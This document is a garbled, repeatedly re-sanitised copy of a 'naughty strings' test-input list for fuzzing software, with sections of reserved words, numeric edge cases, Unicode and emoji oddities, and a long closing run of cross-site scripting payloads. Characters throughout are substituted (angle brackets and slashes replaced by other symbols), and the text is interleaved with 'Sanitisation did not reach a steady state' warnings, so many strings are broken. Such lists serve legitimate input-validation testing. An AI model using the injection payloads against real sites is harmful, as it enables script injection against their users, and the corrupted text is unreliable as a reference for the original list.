# Reserved Strings
#
# Strings which may be used elsewhere in code
_
undefined
undef
null
NULL
(null)
nil
NIL
true
false
True
False
TRUE
FALSE
None
hasOwnProperty
then
constructor
]
]]
_
# Numeric Strings
#
# Strings which can be interpreted as numeric
_
0
1
1.00
$1.00
102
1E2
1E02
1E+02
1
1.00
$1.00
102
1E2
1E02
1E+02
100
000
21474836480-1
92233720368547758080-1
0
0.0
+0
+0.0
0.00
0.0
_
0.0.0
0,00
0,,0
_
0,0,0
0.000
1.000.0
0.000.0
1,000,0
0,000,0
1
_
_
_
999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
NaN
Infinity
Infinity
INF
1#INF
1#IND
1#QNAN
1#SNAN
1#IND
0x0
0xffffffff
0xffffffffffffffff
0xabad1dea
123456789012345678901234567890123456789
1,000.00
1 000.00
1'000.00
1,000,000.00
1 000 000.00
1'000'000.00
1.000,00
1 000,00
1'000,00
1.000.000,00
1 000 000,00
1'000'000,00
01000
08
09
2.2250738585072011e-308
_
# Special Characters
#
# ASCII punctuation.All of these characters may need to be escaped in some
# contexts. Divided into three groups based on (US-layout) keyboard position.
_
.0;'[]]-=
=?@;#{}}_+
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=@@;#{}}_+
!@#$%^&+()`~
_
# Non-whitespace C0 controls; U+0001 through U+0008, U+000E through U+001F
# and U+007F (DEL)
# Often forbidden to appear in various text-based file formats (e.g.XML)
# or reused for internal delimiters on the theory that they should never
# appear in input.
# The next line may appear to be blank or mojibake in some viewers.
	 
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
	  
_
# Non-whitespace C1 controls; U+0080 through U+0084 and U+0086 through U+009F.
# Commonly misinterpreted as additional graphic characters.
# The next line may appear to be blank, mojibake, or dingbats in some viewers.
 
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
  
_
# Whitespace; all of the characters with category Zs, Zl, or Zp (in Unicode
# version 8.0.0), plus U+0009 (HT), U+000B (VT), U+000C (FF), U+0085 (NEL)
# and U+200B (ZERO WIDTH SPACE), which are in the C categories but are often
# treated as whitespace in some contexts.
# This file unfortunately cannot express strings containing
# U+0000, U+000A, or U+000D (NUL, LF, CR).
# The next line may appear to be blank or mojibake in some viewers.
# The next line may be flagged for #trailing whitespace# in some viewers.
​
_
# Unicode additional control characters; all of the characters with
# general category Cf (in Unicode 8.0.0).
# The next line may appear to be blank or mojibake in some viewers.
­؀؁؂؃؄؅؜۝܏᠎​‌‍‎‏‫‬‭‮ ⁠⁡⁢⁣⁤⁧⁨⁩⁪⁪⁫⁬⁭⁮⁯﻿￹￺￻𑂽𛲠𛲡𛲢𛲣𝅳𝅴𝅵𝅶𝅷𝅸𝅹𝅺󠀁󠀠󠀡󠀢󠀣󠀤󠀥󠀦󠀧󠀨󠀩󠀪󠀫󠀬󠀭󠀮󠀯󠀰󠀱󠀲󠀳󠀴󠀵
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
­؀؁؂؃؄؅؜۝܏᠎​‌‍‎‏‬‭‮  ⁠⁡⁢⁣⁤⁨⁩⁪⁪⁪⁫⁬⁭⁮⁯﻿￹￺￻𑂽𛲠𛲡𛲢𛲣𝅳𝅴𝅵𝅶𝅷𝅸𝅹𝅺󠀁󠀠󠀡󠀢󠀣󠀤󠀥󠀦󠀧󠀨󠀩󠀪󠀫󠀬󠀭󠀮󠀯󠀰󠀱󠀲󠀳󠀴󠀵
_
# #Byte order marks#, U+FEFF and U+FFFE, each on its own line.
# The next two lines may appear to be blank or mojibake in some viewers.
﻿
￾
_
# Unicode Symbols
#
# Strings which contain common unicode symbols (e.g.smart quotes)
_
Ω≈ç√∫˜µ≤≥÷
åß∂ƒ©˙∆˚¬…æ
œ∑´®†¥¨ˆøπ“‘
¡™£¢∞§¶•ªº–≠
¸˛Ç◊ı˜Â¯˘¿
ÅÍÎÏ˝ÓÔÒÚÆ☃
Œ„´‰ˇÁ¨ˆØ∏”’
`⁄€‹›ﬁﬂ‡°·‚—±
⅛⅜⅝⅞
ЁЂЃЄЅІЇЈЉЊЋЌЍЎЏАБВГДЕЖЗИЙКЛМНОПРСТУФХЦЧШЩЪЫЬЭЮЯабвгдежзийклмнопрстуфхцчшщъыьэюя
٠١٢٣٤٥٦٧٨٩
_
# Unicode Subscript0Superscript0Accents
#
# Strings which contain unicode subscripts0superscripts; can cause rendering issues
_
⁰⁴⁵
₀₁₂
⁰⁴⁵₀₁₂
ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้
_
# Quotation Marks
#
# Strings which contain misplaced quotation marks; can cause encoding errors
_
'
#
''
##
'#'
#''''#'#
#'#'#''''#
=foo val=“bar” 0?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=foo val=“bar” 0@
=foo val=“bar” 0?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=foo val=“bar” 0@
=foo val=”bar“ 0?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=foo val=”bar“ 0@
=foo val=`bar' 0?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=foo val=`bar' 0@
_
# Two-Byte Characters
#
# Strings which contain two-byte characters; can cause rendering issues or character-length issues
_
田中さんにあげて下さい
パーティーへ行かないか
和製漢語
部落格
사회과학원 어학연구소
찦차를 타고 온 펲시맨과 쑛다리 똠방각하
社會科學院語學研究所
울란바토르
𠜎𠜱𠝹𠱓𠱸𠲖𠳏
_
# Strings which contain two-byte letters; can cause issues with naïve UTF-16 capitalizers which think that 16 bits == 1 character
_
𐐜 𐐔𐐇𐐝𐐀𐐡𐐇𐐓 𐐙𐐊𐐡𐐝𐐓0𐐝𐐇𐐗𐐊𐐤𐐔 𐐒𐐋𐐗 𐐒𐐌 𐐜 𐐡𐐀𐐖𐐇𐐤𐐓𐐝 𐐱𐑂 𐑄 𐐔𐐇𐐝𐐀𐐡𐐇𐐓 𐐏𐐆𐐅𐐤𐐆𐐚𐐊𐐡𐐝𐐆𐐓𐐆
_
# Special Unicode Characters Union
#
# A super string recommended by VMware Inc. Globalization Team; can effectively cause rendering issues or character-length issues to validate product globalization readiness.
#
# 表 CJK_UNIFIED_IDEOGRAPHS (U+8868)
# ポ KATAKANA LETTER PO (U+30DD)
# あ HIRAGANA LETTER A (U+3042)
# A LATIN CAPITAL LETTER A (U+0041)
# 鷗 CJK_UNIFIED_IDEOGRAPHS (U+9DD7)
# Œ LATIN SMALL LIGATURE OE (U+0153)
# é LATIN SMALL LETTER E WITH ACUTE (U+00E9)
# Ｂ FULLWIDTH LATIN CAPITAL LETTER B (U+FF22)
# 逍 CJK_UNIFIED_IDEOGRAPHS (U+900D)
# Ü LATIN SMALL LETTER U WITH DIAERESIS (U+00FC)
# ß LATIN SMALL LETTER SHARP S (U+00DF)
# ª FEMININE ORDINAL INDICATOR (U+00AA)
# ą LATIN SMALL LETTER A WITH OGONEK (U+0105)
# ñ LATIN SMALL LETTER N WITH TILDE (U+00F1)
# 丂 CJK_UNIFIED_IDEOGRAPHS (U+4E02)
# 㐀 CJK Ideograph Extension A, First (U+3400)
# 𠀀 CJK Ideograph Extension B, First (U+20000)
_
表ポあA鷗ŒéＢ逍Üßªąñ丂㐀𠀀
_
# Changing length when lowercased
#
# Characters which increase in length (2 to 3 bytes) when lowercased
# Credit; https;00twitter.com0jifa0status0625776454479970304
_
Ⱥ
Ⱦ
_
# Japanese Emoticons
#
# Strings which consists of Japanese-style emoticons which are popular on the web
_
ヽ༼ຈل͜ຈ༽ﾉ ヽ༼ຈل͜ຈ༽ﾉ
(｡◕ ∀ ◕｡)
｀ｨ(´∀｀∩
ﾛ(,_,+)
・(￣∀￣)・;+
ﾟ･✿ヾ╲(｡◕‿◕｡)╱✿･ﾟ
。・;+;・゜’( ☻ ω ☻ )。・;+;・゜’
(╯°□°）╯︵ ┻━┻)
(ﾉಥ益ಥ）ﾉ﻿ ┻━┻
┬─┬ノ( º _ ºノ)
( ͡° ͜ʖ ͡°)
¯]_(ツ)_0¯
_
# Emoji
#
# Strings which contain Emoji; should be the same behavior as two-byte characters, but not always
_
😍
👩🏽
👨‍🦰 👨🏿‍🦰 👨‍🦱 👨🏿‍🦱 🦹🏿‍♂️
👾 🙇 💁 🙅 🙆 🙋 🙎 🙍
🐵 🙈 🙉 🙊
❤️ 💔 💌 💕 💞 💓 💗 💖 💘 💝 💟 💜 💛 💚 💙
✋🏿 💪🏿 👐🏿 🙌🏿 👏🏿 🙏🏿
👨‍👩‍👦 👨‍👩‍👧‍👦 👨‍👨‍👦 👩‍👩‍👧 👨‍👦 👨‍👧‍👦 👩‍👦 👩‍👧‍👦
🚾 🆒 🆓 🆕 🆖 🆗 🆙 🏧
0️⃣ 1️⃣ 2️⃣ 3️⃣ 4️⃣ 5️⃣ 6️⃣ 7️⃣ 8️⃣ 9️⃣ 🔟
_
# Regional Indicator Symbols
#
# Regional Indicator Symbols can be displayed differently across
# fonts, and have a number of special behaviors
_
🇺🇸🇷🇺🇸 🇦🇫🇦🇲🇸
🇺🇸🇷🇺🇸🇦🇫🇦🇲
🇺🇸🇷🇺🇸🇦
_
# Unicode Numbers
#
# Strings which contain unicode numbers; if the code is localized, it should see the input as numeric
_
１２３
١٢٣
_
# Right-To-Left Strings
#
# Strings which contain text that should be rendered RTL if possible (e.g.Arabic, Hebrew)
_
ثم نفس سقطت وبالتحديد،, جزيرتي باستخدام أن دنو. إذ هنا؟ الستار وتنصيب كان. أهّل ايطاليا، بريطانيا-فرنسا قد أخذ. سليمان، إتفاقية بين ما, يذكر.
בְּרֵאשִׁית, בָּרָא אֱלֹהִים, אֵת הַשָּׁמַיִם, וְאֵת הָאָרֶץ
הָיְתָהtestالصفحات التّحول
﷽
ﷺ
مُنَاقَشَةُ سُبُلِ اِسْتِخْدَامِ اللُّغَةِ فِي النُّظُمِ الْقَائِمَةِ وَفِيم يَخُصَّ التَّطْبِيقَاتُ الْحاسُوبِيَّةُ،
الكل في المجمو عة (5)
_
# Ogham Text
#
# The only unicode alphabet to use a space which isn't empty but should still act like a space.
_
᚛ᚄᚓᚐᚋᚒᚄ ᚑᚄᚂᚑᚏᚅ᚜
᚛ ᚜
_
# Trick Unicode
#
# Strings which contain unicode with unusual properties (e.g. Right-to-left override) (c.f. http;00www.unicode.org0charts0PDF0U2000.pdf)
_
‫‫test‫
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
‬‬test‬
‬test‬
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
‭test‭
test
test⁠test‬
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
test⁠test‭
⁧test⁨
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
⁨test⁩
_
# Zalgo Text
#
# Strings which contain #corrupted# text. The corruption will not appear in non-HTML text, however. (via http;00www.eeemo.net)
_
Ṱ̺̺̕o͞ ̷i̲̬͇̪͙n̝̗͕v̟̜̘̦͟o̶̙̰̠kè͚̮̺̪̹̱̤ ̖t̝͕̳̣̻̪͞h̼͓̲̦̳̘̲e͇̣̰̦̬͎ ̢̼̻̱̘h͚͎͙̜̣̲ͅi̦̲̣̰̤v̻͍e̺̭̳̪̰-m̢iͅn̖̺̞̲̯̰d̵̼̟͙̩̼̘̳ ̞̥̱̳̭r̛̗̘e͙p͠r̼̞̻̭̗e̺̠.̨̹͈̣
̡͓̞ͅI̗̘̦͝n͇͇͙v̮̫ok̲̫̙͈i̖͙̭̹̠̞n̡̻̮̣̺g̲͈͙̭͙̬͎ ̰t͔̦h̞̲e̢̤ ͍̬̲͖f̴̘͕̣è͖ẹ̥̩l͖͔͚i͓͚̦͠n͖͍̗͓̳̮g͍ ̨o͚̪͡f̘̣̬ ̖̘͖̟͙̮c҉͔̫͖͓͇͖ͅh̵̤̣͚͔á̗̼͕ͅo̼̣̥s̱͈̺̖.̛̖̞̠̫̰
̗̺͖̹̯͓Ṯ̤͍̥͇͈h̲́e͏͓̼̗̙̼̣͔ ͇̜̱̠͓͍ͅN͕͠e̗̱z̘̝̜̺͙p̤̺̹͍̯͚e̠̻̠͜r̨̤͍̺̖͔̖̖d̠̟̭̬̝͟i̦͖̩͓͔̤a̠̗̬͉̙n͚͜ ̻̞̰͚ͅh̵͉i̳̞v̢͇ḙ͎͟-҉̭̩̼͔m̤̭̫i͕͇̝̦n̗͙ḍ̟ ̯̲͕͞ǫ̟̯̰.̟
̦H̬̤̗̤͝e͜ ̜̥̝̻͍̟́w̕h̖̯͓o̝͙̖͎̱̮ ҉̺̙̞̟͈W̷̼̭a̺̪͍į͈͕̭͙̯̜t̶̼̮s̘͙͖̕ ̠̫̠B̻͍͙͉̳ͅe̵h̵̬͇̫͙i̹͓̳̳̮͎̫̕n͟d̴̪̜̖ ̰͉̩͇͙̲͞ͅT͖̼͓̪͢h͏͓̮̻e̬̝̟ͅ ̤̹̝W͙̞̝͔͇͝ͅa͏͓͔̹.͕
Z̮̞̠͙͔ͅḀ̗̞͈̻̗Ḷ͙͎̯̹̞͓G̻O̭̗̮
_
# Unicode Upsidedown
#
# Strings which contain unicode with an #upsidedown# effect (via http;00www.upsidedowntext.com)
_
˙ɐnbᴉlɐ ɐuƃɐɯ ǝɹolop ʇǝ ǝɹoqɐl ʇn ʇunpᴉpᴉɔuᴉ ɹodɯǝʇ poɯsnᴉǝ op pǝs 'ʇᴉlǝ ƃuᴉɔsᴉdᴉpɐ ɹnʇǝʇɔǝsuoɔ 'ʇǝɯɐ ʇᴉs ɹolop ɯnsdᴉ ɯǝɹo˥
00˙Ɩ$
_
# Unicode font
#
# Strings which contain bold0italic0etc.versions of normal characters
_
Ｔｈｅ ｑｕｉｃｋ ｂｒｏｗｎ ｆｏｘ ｊｕｍｐｓ ｏｖｅｒ ｔｈｅ ｌａｚｙ ｄｏｇ
𝐓𝐡𝐞 𝐪𝐮𝐢𝐜𝐤 𝐛𝐫𝐨𝐰𝐧 𝐟𝐨𝐱 𝐣𝐮𝐦𝐩𝐬 𝐨𝐯𝐞𝐫 𝐭𝐡𝐞 𝐥𝐚𝐳𝐲 𝐝𝐨𝐠
𝕿𝖍𝖊 𝖖𝖚𝖎𝖈𝖐 𝖇𝖗𝖔𝖜𝖓 𝖋𝖔𝖝 𝖏𝖚𝖒𝖕𝖘 𝖔𝖛𝖊𝖗 𝖙𝖍𝖊 𝖑𝖆𝖟𝖞 𝖉𝖔𝖌
𝑻𝒉𝒆 𝒒𝒖𝒊𝒄𝒌 𝒃𝒓𝒐𝒘𝒏 𝒇𝒐𝒙 𝒋𝒖𝒎𝒑𝒔 𝒐𝒗𝒆𝒓 𝒕𝒉𝒆 𝒍𝒂𝒛𝒚 𝒅𝒐𝒈
𝓣𝓱𝓮 𝓺𝓾𝓲𝓬𝓴 𝓫𝓻𝓸𝔀𝓷 𝓯𝓸𝔁 𝓳𝓾𝓶𝓹𝓼 𝓸𝓿𝓮𝓻 𝓽𝓱𝓮 𝓵𝓪𝔃𝔂 𝓭𝓸𝓰
𝕋𝕙𝕖 𝕢𝕦𝕚𝕔𝕜 𝕓𝕣𝕠𝕨𝕟 𝕗𝕠𝕩 𝕛𝕦𝕞𝕡𝕤 𝕠𝕧𝕖𝕣 𝕥𝕙𝕖 𝕝𝕒𝕫𝕪 𝕕𝕠𝕘
𝚃𝚑𝚎 𝚚𝚞𝚒𝚌𝚔 𝚋𝚛𝚘𝚠𝚗 𝚏𝚘𝚡 𝚓𝚞𝚖𝚙𝚜 𝚘𝚟𝚎𝚛 𝚝𝚑𝚎 𝚕𝚊𝚣𝚢 𝚍𝚘𝚐
⒯⒣⒠ ⒬⒰⒤⒞⒦ ⒝⒭⒪⒲⒩ ⒡⒪⒳ ⒥⒰⒨⒫⒮ ⒪⒱⒠⒭ ⒯⒣⒠ ⒧⒜⒵⒴ ⒟⒪⒢
_
# Script Injection
#
# Strings which attempt to invoke a benign script injection; shows vulnerability to XSS
_
=script?alert(0)=0script?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=script@alert(0)=0script@
&lt;script&gt;alert(&#39;1&#39;);&lt;0script&gt
=img src=x onerror=alert(2) 0?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=img src=x onerror=alert(2) 0@
=svg?=script?123=1?alert(3)=0script?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=svg@=script@123=1@alert(3)=0script@
#?=script?alert(4)=0script?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
#@=script@alert(4)=0script@
'?=script?alert(5)=0script?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
'@=script@alert(5)=0script@
?=script?alert(6)=0script?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
@=script@alert(6)=0script@
=0script?=script?alert(7)=0script?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=0script@=script@alert(7)=0script@
= 0 script ?= script ?alert(8)= 0 script ?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
= 0 script @= script @alert(8)= 0 script @
onfocus=JaVaSCript;alert(9) autofocus
# onfocus=JaVaSCript;alert(10) autofocus
' onfocus=JaVaSCript;alert(11) autofocus
＜script＞alert(12)＜0script＞
=sc=script?ript?alert(13)=0sc=0script?ript?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=sc=script@ript@alert(13)=0sc=0script@ript@
?=script?alert(14)=0script?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
@=script@alert(14)=0script@
#;alert(15);t=#
';alert(16);t='
JavaSCript;alert(17)
alert(18)
src=JaVaSCript;prompt(19)
#?=script?alert(20);=0script x=#
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
#@=script@alert(20);=0script x=#
'?=script?alert(21);=0script x='
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
'@=script@alert(21);=0script x='
?=script?alert(22);=0script x=
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
@=script@alert(22);=0script x=
# autofocus onkeyup=#javascript;alert(23)
' autofocus onkeyup='javascript;alert(24)
=script]x20type=#text0javascript#?javascript;alert(25);=0script?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=script]x20type=#text0javascript#@javascript;alert(25);=0script@
=script]x3Etype=#text0javascript#?javascript;alert(26);=0script?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=script]x3Etype=#text0javascript#@javascript;alert(26);=0script@
=script]x0Dtype=#text0javascript#?javascript;alert(27);=0script?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=script]x0Dtype=#text0javascript#@javascript;alert(27);=0script@
=script]x09type=#text0javascript#?javascript;alert(28);=0script?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=script]x09type=#text0javascript#@javascript;alert(28);=0script@
=script]x0Ctype=#text0javascript#?javascript;alert(29);=0script?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=script]x0Ctype=#text0javascript#@javascript;alert(29);=0script@
=script]x2Ftype=#text0javascript#?javascript;alert(30);=0script?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=script]x2Ftype=#text0javascript#@javascript;alert(30);=0script@
=script]x0Atype=#text0javascript#?javascript;alert(31);=0script?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=script]x0Atype=#text0javascript#@javascript;alert(31);=0script@
'`#?=]x3Cscript?javascript;alert(32)=0script?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
'`#@=]x3Cscript@javascript;alert(32)=0script@
'`#?=]x00script?javascript;alert(33)=0script?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
'`#@=]x00script@javascript;alert(33)=0script@
ABC=div style=#x]x3Aexpression(javascript;alert(34)#?DEF
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
ABC=div style=#x]x3Aexpression(javascript;alert(34)#@DEF
ABC=div style=#x;expression]x5C(javascript;alert(35)#?DEF
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
ABC=div style=#x;expression]x5C(javascript;alert(35)#@DEF
ABC=div style=#x;expression]x00(javascript;alert(36)#?DEF
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
ABC=div style=#x;expression]x00(javascript;alert(36)#@DEF
ABC=div style=#x;exp]x00ression(javascript;alert(37)#?DEF
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
ABC=div style=#x;exp]x00ression(javascript;alert(37)#@DEF
ABC=div style=#x;exp]x5Cression(javascript;alert(38)#?DEF
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
ABC=div style=#x;exp]x5Cression(javascript;alert(38)#@DEF
ABC=div style=#x;]x0Aexpression(javascript;alert(39)#?DEF
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
ABC=div style=#x;]x0Aexpression(javascript;alert(39)#@DEF
ABC=div style=#x;]x09expression(javascript;alert(40)#?DEF
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
ABC=div style=#x;]x09expression(javascript;alert(40)#@DEF
ABC=div style=#x;]xE3]x80]x80expression(javascript;alert(41)#?DEF
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
ABC=div style=#x;]xE3]x80]x80expression(javascript;alert(41)#@DEF
ABC=div style=#x;]xE2]x80]x84expression(javascript;alert(42)#?DEF
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
ABC=div style=#x;]xE2]x80]x84expression(javascript;alert(42)#@DEF
ABC=div style=#x;]xC2]xA0expression(javascript;alert(43)#?DEF
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
ABC=div style=#x;]xC2]xA0expression(javascript;alert(43)#@DEF
ABC=div style=#x;]xE2]x80]x80expression(javascript;alert(44)#?DEF
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
ABC=div style=#x;]xE2]x80]x80expression(javascript;alert(44)#@DEF
ABC=div style=#x;]xE2]x80]x8Aexpression(javascript;alert(45)#?DEF
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
ABC=div style=#x;]xE2]x80]x8Aexpression(javascript;alert(45)#@DEF
ABC=div style=#x;]x0Dexpression(javascript;alert(46)#?DEF
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
ABC=div style=#x;]x0Dexpression(javascript;alert(46)#@DEF
ABC=div style=#x;]x0Cexpression(javascript;alert(47)#?DEF
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
ABC=div style=#x;]x0Cexpression(javascript;alert(47)#@DEF
ABC=div style=#x;]xE2]x80]x87expression(javascript;alert(48)#?DEF
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
ABC=div style=#x;]xE2]x80]x87expression(javascript;alert(48)#@DEF
ABC=div style=#x;]xEF]xBB]xBFexpression(javascript;alert(49)#?DEF
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
ABC=div style=#x;]xEF]xBB]xBFexpression(javascript;alert(49)#@DEF
ABC=div style=#x;]x20expression(javascript;alert(50)#?DEF
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
ABC=div style=#x;]x20expression(javascript;alert(50)#@DEF
ABC=div style=#x;]xE2]x80]x88expression(javascript;alert(51)#?DEF
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
ABC=div style=#x;]xE2]x80]x88expression(javascript;alert(51)#@DEF
ABC=div style=#x;]x00expression(javascript;alert(52)#?DEF
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
ABC=div style=#x;]x00expression(javascript;alert(52)#@DEF
ABC=div style=#x;]xE2]x80]x8Bexpression(javascript;alert(53)#?DEF
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
ABC=div style=#x;]xE2]x80]x8Bexpression(javascript;alert(53)#@DEF
ABC=div style=#x;]xE2]x80]x86expression(javascript;alert(54)#?DEF
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
ABC=div style=#x;]xE2]x80]x86expression(javascript;alert(54)#@DEF
ABC=div style=#x;]xE2]x80]x85expression(javascript;alert(55)#?DEF
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
ABC=div style=#x;]xE2]x80]x85expression(javascript;alert(55)#@DEF
ABC=div style=#x;]xE2]x80]x82expression(javascript;alert(56)#?DEF
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
ABC=div style=#x;]xE2]x80]x82expression(javascript;alert(56)#@DEF
ABC=div style=#x;]x0Bexpression(javascript;alert(57)#?DEF
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
ABC=div style=#x;]x0Bexpression(javascript;alert(57)#@DEF
ABC=div style=#x;]xE2]x80]x81expression(javascript;alert(58)#?DEF
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
ABC=div style=#x;]xE2]x80]x81expression(javascript;alert(58)#@DEF
ABC=div style=#x;]xE2]x80]x83expression(javascript;alert(59)#?DEF
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
ABC=div style=#x;]xE2]x80]x83expression(javascript;alert(59)#@DEF
ABC=div style=#x;]xE2]x80]x89expression(javascript;alert(60)#?DEF
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
ABC=div style=#x;]xE2]x80]x89expression(javascript;alert(60)#@DEF
=a href=#]x0Bjavascript;javascript;alert(61)# id=#fuzzelement1#?test=0a?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=a href=#]x0Bjavascript;javascript;alert(61)# id=#fuzzelement1#@test=0a@
=a href=#]x0Fjavascript;javascript;alert(62)# id=#fuzzelement1#?test=0a?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=a href=#]x0Fjavascript;javascript;alert(62)# id=#fuzzelement1#@test=0a@
=a href=#]xC2]xA0javascript;javascript;alert(63)# id=#fuzzelement1#?test=0a?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=a href=#]xC2]xA0javascript;javascript;alert(63)# id=#fuzzelement1#@test=0a@
=a href=#]x05javascript;javascript;alert(64)# id=#fuzzelement1#?test=0a?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=a href=#]x05javascript;javascript;alert(64)# id=#fuzzelement1#@test=0a@
=a href=#]xE1]xA0]x8Ejavascript;javascript;alert(65)# id=#fuzzelement1#?test=0a?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=a href=#]xE1]xA0]x8Ejavascript;javascript;alert(65)# id=#fuzzelement1#@test=0a@
=a href=#]x18javascript;javascript;alert(66)# id=#fuzzelement1#?test=0a?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=a href=#]x18javascript;javascript;alert(66)# id=#fuzzelement1#@test=0a@
=a href=#]x11javascript;javascript;alert(67)# id=#fuzzelement1#?test=0a?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=a href=#]x11javascript;javascript;alert(67)# id=#fuzzelement1#@test=0a@
=a href=#]xE2]x80]x88javascript;javascript;alert(68)# id=#fuzzelement1#?test=0a?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=a href=#]xE2]x80]x88javascript;javascript;alert(68)# id=#fuzzelement1#@test=0a@
=a href=#]xE2]x80]x89javascript;javascript;alert(69)# id=#fuzzelement1#?test=0a?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=a href=#]xE2]x80]x89javascript;javascript;alert(69)# id=#fuzzelement1#@test=0a@
=a href=#]xE2]x80]x80javascript;javascript;alert(70)# id=#fuzzelement1#?test=0a?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=a href=#]xE2]x80]x80javascript;javascript;alert(70)# id=#fuzzelement1#@test=0a@
=a href=#]x17javascript;javascript;alert(71)# id=#fuzzelement1#?test=0a?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=a href=#]x17javascript;javascript;alert(71)# id=#fuzzelement1#@test=0a@
=a href=#]x03javascript;javascript;alert(72)# id=#fuzzelement1#?test=0a?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=a href=#]x03javascript;javascript;alert(72)# id=#fuzzelement1#@test=0a@
=a href=#]x0Ejavascript;javascript;alert(73)# id=#fuzzelement1#?test=0a?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=a href=#]x0Ejavascript;javascript;alert(73)# id=#fuzzelement1#@test=0a@
